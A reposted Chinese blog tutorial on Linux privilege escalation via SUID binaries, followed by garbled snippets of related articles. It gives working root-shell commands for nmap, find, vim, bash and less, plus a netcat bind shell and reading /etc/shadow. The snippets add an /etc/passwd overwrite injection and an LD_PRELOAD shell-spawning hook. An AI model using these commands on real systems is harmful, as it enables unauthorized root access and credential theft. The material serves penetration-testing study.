Linux提权————利用SUID提权

最新推荐文章于 2025-07-22 11:10:30 发布
转载 最新推荐文章于 2025-07-22 11:10:30 发布 · 2.7w 阅读 · 81

本文介绍了Linux系统中利用SUID权限进行提权的方法。详细列举了Nmap、Vim等常见工具的提权操作,并提供了具体的命令示例。

前言

今天给大家带来的是linux下的提权技巧。

SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。

已知的可用来提权的linux可行性的文件列表如下:

  • Nmap
  • Vim
  • find
  • Bash
  • More
  • Less
  • Nano
  • cp

以下命令可以发现系统上运行的所有SUID可执行文件。具体来说,命令将尝试查找具有root权限的SUID的文件。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

以上所有二进制文件都将以root用户权限执行,因为它们的权限中包含"s",并且对应的是root权限。

ls -l /usr/bin/nmap
-rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap

NMAP

较旧版本的Nmap(2.02至5.21)具有交互模式,允许用户执行shell命令。由于Nmap在使用root权限执行的二进制文件列表中,因此可以使用交互式控制台来运行具有相同权限的shell。

nmap -V

交互模式可以通过执行Nmap参数" interactive "

nmap --interactive

以下命令将提供一个提升的shell。

nmap> !sh
sh-3.2# whoami
root

也可以通过Metasploit模块对Nmap的二进制文件进行权限提升。

exploit/unix/local/setuid_nmap

Find

如果Find命令也是以Suid权限运行的话,则将通过find执行的所有命令都会以root权限执行。

touch pentestlab
find pentestlab -exec whoami \;

大部分Linux操作系统都安装了netcat,因此也可以被利用来将权限提升至root。

find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

连接上去就会直接获取到一个Root权限的shell。

netcat 192.168.1.189 5555
id
cat /etc/shadow

VIM

Vim是Linux环境下的一款文件编辑器。但是,如果以SUID运行的话,它会继承root用户的权限,因此可以读取系统上的所有文件。

vim.tiny /etc/shadow

vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell

Bash

以下命令将以root权限打开一个bash shell。

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(serv

Less

Less和More都执行以用来提权。

less /etc/passwd
!/bin/sh


获取到Root权限

参考资料

https://pentestlab.blog/2017/09/25/suid-executables/

http://blog.youkuaiyun.com/haofeifei6/article/details/11516753

威胁情报分析平台

最近在做一些威胁情报分析,apt攻击源分析中,发现了一个很好的平台,给大家推荐一下。

http://www.secange.com/2017/10/%E5%A8%81%E8%83%81%E6%83%85%E6%8A%A5%E5%88%86%E6%9E%90%E5%B9%B3%E5%8F%B0/

平台地址:http://www.vxcube.com

 

Linux权——环境变量配合SUID&计划任务&第三方数据库
m0_61506558的博客
01-27 850
原始的ps命令,由于环境变量加了tmp,执行ps,即执行/tmp/ps,同时ps是通过bash复制过来的,./shell用SUID执行bash直接进行了取。
Linux常见方式
L_erAry的博客
08-11 2841
taskset命令用于设置进程(或 线程)的处理器亲和性(Processor Affinity),可以将进程(或 线程)绑定到特定的一个 或 多个CPU上去执行,而不允许将进程(或 线程)调度到其他的CPU上。在Linux/Unix中,/etc/sudoers文件是sudo限的配置文件,其中储存了一些用户或组可以以root限使用的命令。使用方法是,创建一个临时的文件,并在其中构建一个包来调用/bin/bash,然后通过apt-get安装该包。通过压缩一个存在的文件,并调用-T参数输出shell。
学习之旅——Linux操作系统
Lemon's blog
08-19 3186
前言: 上次学习了Windows操作系统的以及相关工具的利用,这次就来学习一下Linux操作系统的 Linux基础 0x00:Linux方法 大致归纳总结如下:
suidlinux
weixin_68652890的博客
04-15 1125
suid suid(设置用户的id)是Linux中的一种特殊限,当运行具有suid限的二进制文件的时候,使得调用者暂时获得该文件拥有者的限(比如a文件拥有者是root,且被赋予了s限,当我们用另外一个普通用户调用a文件的时候,调用过程中这个普通用户会获得root限) 除了经常看见的rwx限还有s限 s限,设置使文件在执行阶段具有文件所有者的限,相当于临时拥有文件所有者的身份。 SUID 当执行的文件被赋予了s限,就被称为Set UID,简称为SUID的特殊限。简称为SUID的特殊
Linux详解:覆盖所有关键点,绝对超全的教程
最新发布
kjuhfkicf154的博客
07-22 898
Linux系统中的特升级通常以获取root限为目标。系统通过用户、组和文件限机制实现访问控制:用户可属于多个组,每个文件/目录都有针对所有者、组和其他用户的rwx限设置。特殊限包括SUID(以所有者限执行)和SGID(以组限执行)。每个用户拥有真实UID、有效UID和保存UID,其中有效UID用于限验证。管理员可通过查看/etc/passwd、/etc/shadow等文件获取用户信息,使用ls -l查看文件限,通过ps、netstat等命令监控系统状态。常见方法包括查找SUID/SGI
SUID
snowlyzz的博客
08-14 1939
久经不衰的SUID
Linuxsuid
weixin_43995499的博客
03-01 2235
Linuxsuid篇 不知攻,焉知防 一个在安服路上摸索的大三生,记录平时学习笔记 suid前言: 1.只有可以执行的二进制程序文件才能设定SUID限,非二进制文件设置SUID限没任何意义. 2.命令执行者要对该程序文件拥有执行(x)限. 3.命令执行者在执行该程序时获得该程序文件属主的身份. 4.SUID限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效 实验环境: kali 靶机账号 :muhammad 密码 : nasef START: 靶机自带文件suid
Linux SUID
zmx999999的博客
03-23 571
GTFOBins 是一个专注于 Unix/Linux 系统(Privilege Escalation)和限绕过(Bypass) 的威开源项目,它收集了大量常见系统程序(如 find、vim、nmap 等)的利用方法,帮助安全研究人员和 CTF 选手快速识别和利用配置不当的程序获取更高限。
Linux:SUID
Elite的博客
03-05 3066
以find命令为例,讲解SUID原理
linux权—大赏
qq_55202378的博客
04-20 1687
我的理解是:靶机的shell标准输入、输出、错误输出都与127.0.0.1:4444的输出建立了TCP连接,也就是说靶机shell所有的输出信息都会显示到监听127.0.0.1:4444的shell中,唯独没有解决从127.0.0.1:4444向靶机发送命令。文件中,每个用户的密码都是用一个特定的哈希函数加密的。查看当前系统的自动任务后,一方面可以定位定时脚本的位置,然后将shell写到定时脚本中,实现;时本来就是root限,预先加载共享库shell.so时,也是以root用户的限去加载的。
升-linux手法总结.zip
05-08
以下是对"升——Linux手法总结"的详细说明: 1. **缓冲区溢出(Buffer Overflow)**:这是经典的漏洞。当程序处理用户输入时,如果没有正确检查边界,可能会导致内存溢出,从而覆盖函数返回地址,...
LinuxSUID
CP1024的博客
04-04 4143
LinuxSUID SUID 1. SUID限只能设置二进制文件 2. 命令执行者要有二进制文件的执行 3. 命令执行者执行二进制文件时会获得该程序的属主身份 4. SUID限只在程序执行中有效 即如果root给一个程序赋予了SUID限,则普通用户在执行该程序过程中,是root限 cp命令 以cp为例,这里给cp添加SUID限做测试,拥有SUID限的程序会由rwx变成rws 也可以通过find / -perm -u=s -type f 2>dev/null命令来
linux suid
qq_42307546的博客
04-15 732
SUID是赋予文件的一种限,它会出现在文件拥有者限的执行位上,具有这种限的文件会在其执行 时,使调用者暂时获得该文件拥有者的限。也就是如果ROOT用户给某个可执行文件加了S限,那么 该执行程序运行的时候将拥有ROOT限 以下命令可以发现系统上运行的所有SUID可执行文件 find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000-print2>/dev/null find / -user root -perm
Linux Suid
YouthBelief的博客
12-21 814
Suid 原理 SUID(设置用户ID)是一种限类型,它被赋予一个文件,允许用户以其所有者的限执行该文件。Linux二进制文件可以拥有这种类型的限集有很多原因。例如,ping实用程序需要root限才能打开网络套接字,但它也需要由标准用户执行,以验证与其他主机的连通性。 但是,如果某些现有的二进制文件和实用程序具有 SUID 限,则它们可用于将升为 root。 suid限 表示 chmod u+s 如下 二进制文件以 root 限执行,因为它们的限中包含“ s ”,并且它们归 roo
linux系统suid
focus on security
05-19 5838
SUID 0x01什么是SUIDSUID (Set UID)是Linux中的一种特殊限,其功能为用户运行某个程序时,如果该程序有SUID限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义. ​ 在执行过程中,调用者会暂时获得该文件的所有者限,且该限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果
SUID
热门推荐
一只web狗
07-01 1万+
SUID介绍
suid
03-16
### SUID方法及其实现技巧 SUID(Set User ID upon execution)是一种Linux文件限标志,允许用户以文件所有者的身份执行该文件。如果某些具有SUID位设置的可执行文件存在漏洞,则可能被攻击者利用限。以下是几种常见的SUID方法及其技术细节: #### 1. **查找并分析带有SUID位的文件** 通过命令`find / -perm -u=s -type f 2>/dev/null`可以扫描整个文件系统,寻找设置了SUID位的二进制文件[^3]。这些文件通常用于特定功能的需求,但如果它们未经过充分的安全验证,可能会成为潜在的入口。 #### 2. **SUID配置不当** 当一个程序拥有SUID限却未能正确处理输入数据时,就可能存在安全隐患。例如,假设有一个名为`suid_example`的应用程序,它读取用户的输入并将之写入日志文件。如果此应用没有过滤特殊字符或者路径名中的斜杠 (`/`),那么攻击者可以通过精心构造输入覆盖重要文件的内容,甚至获取root shell访问限。 ```bash # 假设 suid_example 存在一个简单的字符串拼接错误 ./suid_example "$(echo 'malicious content' > /etc/passwd)" ``` 上述例子展示了如何滥用此类缺陷篡改关键系统资源。 #### 3. **$PATH变量劫持** 许多脚本依赖于环境变量 `$PATH` 来定位外部工具的位置。如果攻击者能够控制当前用户的 PATH 设置,并在其前面插入自定义目录,则他们可以在其中放置同名但恶意版本的标准实用程序。一旦受害者运行受影响的SUID程序,就会无意间调用了伪造版命令而非官方发行版本。 考虑下面这个场景: - 攻击者创建了一个假的 `ls` 工具放在 `/tmp/bin/ls` 中; - 将自己的临时目录加入到受害人的搜索顺序之前 (即 export PATH=/tmp/bin:$PATH ); - 当受害人尝试使用 ls 查看信息时实际上启动的是攻击者的特洛伊木马版本。 这种手法特别适用于那些直接嵌套其他子进程而不显式指定绝对路径名称的情况下的SUID程序。 #### 4. **动态链接库(LD_PRELOAD) 劫持** 除了传统的 $PATH 变量劫持外, 还有一种更隐蔽的方式叫做 LD_PRELOAD 注入法。这种方法涉及到了 Linux 下面的一个特性——允许开发者预先加载一些共享对象( .so 文件),即使是在别人的进程中也可以强行注入自定义行为逻辑进去 [^4]. 如果某个 SUID 应用信任了来自外界传来的参数或者是打开了不受保护的数据流接口的话 , 那么就可以借此机会完成进一步的操作链路构建. 举个简单实例说明这个问题的影响范围: ```c // evil.c #define _GNU_SOURCE #include <stdio.h> #include <dlfcn.h> void *malloc(size_t size){ void (*original_malloc)(size_t); char* command="/bin/bash"; original_malloc=dlsym(RTLD_NEXT,"malloc"); ((void*)original_malloc)(size); system(command); // Spawn a root shell. } ``` 编译之后得到 so 文件再配合合适的条件触发即可获得交互式的超级管理员会话窗口. --- ### 总结 以上列举了几种典型的基于 SUID 的本地手段以及相应的缓解措施建议。值得注意的是,在实际环境中应当定期审查服务器上的敏感限分配状况,并及时修补已知脆弱点所在之处以防患未然。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值